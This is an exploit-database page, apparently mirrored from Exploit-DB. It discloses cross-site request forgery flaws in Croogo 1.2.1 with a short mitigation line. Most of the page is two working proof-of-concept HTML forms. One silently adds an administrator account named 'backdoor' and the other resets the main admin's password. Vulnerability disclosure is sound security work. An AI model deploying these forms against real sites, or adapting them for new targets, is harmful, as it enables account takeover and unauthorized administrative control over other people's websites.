header-logo
Suggest Exploit
vendor:
Croogo
by:
Milos Zivanovic
7,5
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: Croogo
Affected Version From: 1.2.1
Affected Version To: 1.2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:croogo:croogo:1.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

Croogo 1.2.1 Multiple CSRF Vulnerabilities

Croogo blog script lacks of cross site request forgery protection, allowing us to make exploit to add new admin user or change existing admin password.

Mitigation:

Implementing CSRF protection on the application.
Source

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Croogo 1.2.1 Multiple CSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 07. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Croogo
[#] Version: 1.2.1
[#] Platform: PHP
[#] Site: http://www.croogo.org
[#] Download: http://croogo.googlecode.com/files/croogo-1.2.1.zip
[#] Vulnerability: Cross Site Request Forgery
[#-----------------------------------------------------------------------------------------------#]

Croogo blog script lacks of cross site request forgery protection,
allowing us to make exploit to add new admin user or change existing
admin password.

[#]Content
 |--CSRF
    |--Add Administrator
    |--Change Administrators Password

[*] Add Administrator

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="/localhost/cro/admin/users/add" method="post">
  <input type="hidden" name="_method" value="POST"/>
  <input type="hidden" name="data[User][role_id]" value="1"/>
  <input type="hidden" name="data[User][username]" value="backdoor"/>
  <input type="hidden" name="data[User][password]" value="hacked"/>
  <input type="hidden" name="data[User][name]" value="thisismyname"/>
  <input type="hidden" name="data[User][email]" value="my@mail.com"/>
  <input type="hidden" name="data[User][website]" value="website"/>
  <input type="hidden" name="data[User][status]" value="1"/>
  <input type="submit" name="submit" value="Submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[*] Change Administrators Password

In this exploit 1 is the ID of the admin user that we want to edit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="/localhost/cro/admin/users/reset_password/1" method="post">
  <input type="hidden" name="_method" value="PUT"/>
  <input type="hidden" name="data[User][id]" value="1"/>
  <input type="hidden" name="data[User][username]" value="admin"/>
  <input type="hidden" name="data[User][password]" value="hacked"/>
  <input type="submit" name="submit" value="Submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF

Navigation

Suggest Exploit

Services By CQR